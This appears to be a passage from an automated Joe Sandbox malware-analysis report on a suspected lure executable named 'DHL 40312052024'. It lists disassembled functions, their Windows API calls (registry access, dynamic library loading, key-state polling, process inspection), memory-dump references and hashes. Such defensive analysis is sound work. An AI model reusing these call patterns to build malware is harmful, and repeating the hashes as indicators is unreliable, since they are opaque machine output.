                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: b7f934cfc577aa3fcee37f9822d3578b9e8c24facbb52ff378b5e4c2ec35ead2
                                                                                    • Instruction ID: 32ad98eae76a9eeced8112cca9712fccecea434ef02afa1da15be842aa1fd0e4
                                                                                    • Opcode Fuzzy Hash: b7f934cfc577aa3fcee37f9822d3578b9e8c24facbb52ff378b5e4c2ec35ead2
                                                                                    • Instruction Fuzzy Hash: 00213130A00109EFCB10DB65DD45EEE7BB8FF89714B004469F909DB252DA35EA41DB61
                                                                                    Function 00811AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00811B19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                    • API String ID: 3964851224-769500911
                                                                                    • Opcode ID: 4baf3efe87bd2d0eede96cf180ba105bfd30c3b162b692f6c3bb13bc03537075
                                                                                    • Instruction ID: df7ec1a7af1c9e7aa2a315c1d440a8985ceaa89f069413b74e7319abaa35770d
                                                                                    • Opcode Fuzzy Hash: 4baf3efe87bd2d0eede96cf180ba105bfd30c3b162b692f6c3bb13bc03537075
                                                                                    • Instruction Fuzzy Hash: B0115E30900108CFCF00EFA4D8599EEB7B4FF65304F148565D915A7292FB325D0ACB50
                                                                                    Function 0082EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0082EC07
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0082EC37
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0082ED6A
                                                                                    • CloseHandle.KERNEL32(?), ref: 0082EDEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: c2c00658dc3a4d8636af177ea70d1e44d5dbbb98aae5d32790f9ecae648ca44d
                                                                                    • Instruction ID: 1a784cfbec55aff2811cb0e3d8f1ac77638161f4d93735901a6154ae3e1f6c21
                                                                                    • Opcode Fuzzy Hash: c2c00658dc3a4d8636af177ea70d1e44d5dbbb98aae5d32790f9ecae648ca44d
                                                                                    • Instruction Fuzzy Hash: E5815E716043109FD760EF28D886B6AB7E5EF48710F14881DFAA9DB2D2D674AC40CB96
                                                                                    Function 007D541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1559183368-0
                                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction ID: 4b59f49a638ebdae8b62d49a6d8505712e363ea21609fd60e6dd1393a1daa051
                                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction Fuzzy Hash: D851E570A00B45DBCB258F69E88466E77B3AF40320F24872BF826963D0D779DDA08B41
                                                                                    Function 00830037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008300FD
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0083013C
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00830183
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 008301AF
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008301BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3440857362-0
                                                                                    • Opcode ID: 72b13c6cfa80ba9e905420cb3aab17ecc50b0e81f8932e42d3455d48ee3add93
                                                                                    • Instruction ID: 22e23d73da506a23b55766519c5486860dd6e73b908cff080269fd0eb2013eba
                                                                                    • Opcode Fuzzy Hash: 72b13c6cfa80ba9e905420cb3aab17ecc50b0e81f8932e42d3455d48ee3add93
                                                                                    • Instruction Fuzzy Hash: E1510671208204AFD718EB58C895FAAB7E9FF84314F44892DB595872A2DB35E904CB92
                                                                                    Function 0082D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082D927
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0082D9AA
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0082D9C6
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0082DA07
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082DA21
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 5b91974d1ef47489bfdef326b864397ea6c37c7e518bd41eacab91a7ff1fac32
                                                                                    • Instruction ID: c2c6e1fda054381e28e9658c4d17f2ac1e2e5c8abc9d7e13141bafd8dc2393d1
                                                                                    • Opcode Fuzzy Hash: 5b91974d1ef47489bfdef326b864397ea6c37c7e518bd41eacab91a7ff1fac32
                                                                                    • Instruction Fuzzy Hash: D4512775A04219DFCB00EFA8D488AADBBF4FF49314B048065E956AB322D734AD85CF91
                                                                                    Function 0081E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0081E61F
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0081E648
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0081E687
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0081E6AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0081E6B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 60894f07db5a09a6e5d56a01f59ab3b9af10d3ec5fe13ba13765f3c09d2db343
                                                                                    • Instruction ID: 2e2810f16b2cca1df9292fc2d6a16de2e21995d96ef377e93b786e36698402aa
                                                                                    • Opcode Fuzzy Hash: 60894f07db5a09a6e5d56a01f59ab3b9af10d3ec5fe13ba13765f3c09d2db343
                                                                                    • Instruction Fuzzy Hash: 82511935A00205DFCB01EF64C985AAEBBF5FF49314F1480A9E919AB362CB35ED51DB50
                                                                                    Function 0083A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca961f68d5935a4db0c6de832d54650059648aa72cabb01ec9b329ada9d774a0
                                                                                    • Instruction ID: 90cc00dde22fdd23951c5eb142145aa98318d8f38aaadd5bbbefeb5618a5955c
                                                                                    • Opcode Fuzzy Hash: ca961f68d5935a4db0c6de832d54650059648aa72cabb01ec9b329ada9d774a0
                                                                                    • Instruction Fuzzy Hash: CD41E435904508EFC718DF28CC98FAABBA8FB89310F140565F996E72E1C7709D41DAD1
                                                                                    Function 007B2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 007B2357
                                                                                    • ScreenToClient.USER32(008757B0,?), ref: 007B2374
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 007B2399
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: bd5d8c640284e263f26917ee0c48817d9cb497e93784ad1e2484c03f89b8dd5a
                                                                                    • Instruction ID: df664a0f9d03ec154287715575ae8800b4a6feb5d74a0e7296d092e2850d4c50
                                                                                    • Opcode Fuzzy Hash: bd5d8c640284e263f26917ee0c48817d9cb497e93784ad1e2484c03f89b8dd5a
                                                                                    • Instruction Fuzzy Hash: F1418035A05105FBDF169F69CC48BEDBBB4FB09364F204319F829932A1C7389991DB91
                                                                                    Function 008063AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008063E7
                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00806433
                                                                                    • TranslateMessage.USER32(?), ref: 0080645C
                                                                                    • DispatchMessageW.USER32(?), ref: 00806466
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00806475
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                    • String ID:
                                                                                    • API String ID: 2108273632-0
                                                                                    • Opcode ID: 3f73485637427a45b0ee10467f9c0f530486a8e58029902d1895d70d4e16b2ac
                                                                                    • Instruction ID: 61e3a488cc6805dab9182060efc6d269d30029ba2fe7848d72a3b0c0be7ea8e8
                                                                                    • Opcode Fuzzy Hash: 3f73485637427a45b0ee10467f9c0f530486a8e58029902d1895d70d4e16b2ac
                                                                                    • Instruction Fuzzy Hash: 1C31E431900A46AFDBA4CFB4CC89BB67BACFB01314F140165E429C21E1F765D4B9DBA1
                                                                                    Function 00808A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00808A30
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00808ADA
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00808AE2
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00808AF0
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00808AF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                                                                                    • Instruction ID: 8ac287e5c58d77c99fab69035d7e5394bad8a60e711b9dcb746f10b16b585736
                                                                                    • Opcode Fuzzy Hash: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                                                                                    • Instruction Fuzzy Hash: 9A310071A00229EFDF00CFA8DD4DA9E3BB5FB44325F10862AF965E61D1C7B09954CB91
                                                                                    Function 0080B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0080B204
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0080B221
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0080B259
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0080B27F
                                                                                    • _wcsstr.LIBCMT ref: 0080B289
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: d19cc3d5d4cc2af11133c5288420b2abb672c4d8512bf2356d9d6e6ad410d499
                                                                                    • Instruction ID: 8a7d2a2bd34cb9e818e8b8fc403c2609e1db4737a534d54fbf8690c8edfc4ac5
                                                                                    • Opcode Fuzzy Hash: d19cc3d5d4cc2af11133c5288420b2abb672c4d8512bf2356d9d6e6ad410d499
                                                                                    • Instruction Fuzzy Hash: 0A210771604204BBEB655B75DC09E7F7BA8EF99710F00413EF804DA1A1EF65DC4192A0
                                                                                    Function 0083B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083B192
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0083B1B7
                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0083B1CF
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0083B1F8
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00820E90,00000000), ref: 0083B216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2294984445-0
                                                                                    • Opcode ID: d48e63e0140f9ad15a83fedc20674bd104946cd561fdb8310cb1a7b3c229dbe4
                                                                                    • Instruction ID: aa2f4049c914d3fe094532e888bf864fe08a4d5bf637d03e4ee9742678c47388
                                                                                    • Opcode Fuzzy Hash: d48e63e0140f9ad15a83fedc20674bd104946cd561fdb8310cb1a7b3c229dbe4
                                                                                    • Instruction Fuzzy Hash: 34219FB1A10655EFCB109F389C08A6E3BA4FB85365F114B38FA36D71E1E73098508BD0
                                                                                    Function 00809307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00809320
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809352
                                                                                    • __itow.LIBCMT ref: 0080936A
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809392
                                                                                    • __itow.LIBCMT ref: 008093A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2983881199-0
                                                                                    • Opcode ID: e117b209cfb10f17f48f48faf9d7c95d5898b0faed2f52acabab197f88846382
                                                                                    • Instruction ID: 4bc70e0e2d111b23c49fc3a90a35881061254cf83144cde20f7ec8016a6b1532
                                                                                    • Opcode Fuzzy Hash: e117b209cfb10f17f48f48faf9d7c95d5898b0faed2f52acabab197f88846382
                                                                                    • Instruction Fuzzy Hash: 9E21C831B01208ABDB109B649C8AEEF7BBDFB98710F055025FA45D73D2E6748D41CB92
                                                                                    Function 00825A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00825A6E
                                                                                    • GetForegroundWindow.USER32 ref: 00825A85
                                                                                    • GetDC.USER32(00000000), ref: 00825AC1
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00825ACD
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00825B08
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: 69188640867008a445d0ece9f8c9b0280bb243408b246c5e34e640f79ba143e1
                                                                                    • Instruction ID: 99c8d08366e0b01572815b4d31d55030fe40a0eb16331b88101aaf22f3435da4
                                                                                    • Opcode Fuzzy Hash: 69188640867008a445d0ece9f8c9b0280bb243408b246c5e34e640f79ba143e1
                                                                                    • Instruction Fuzzy Hash: 28219275A00114EFD700EF68E889A9ABBF5FF88310F148479F90AD7352DA34AC40CB90
                                                                                    Function 007B12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
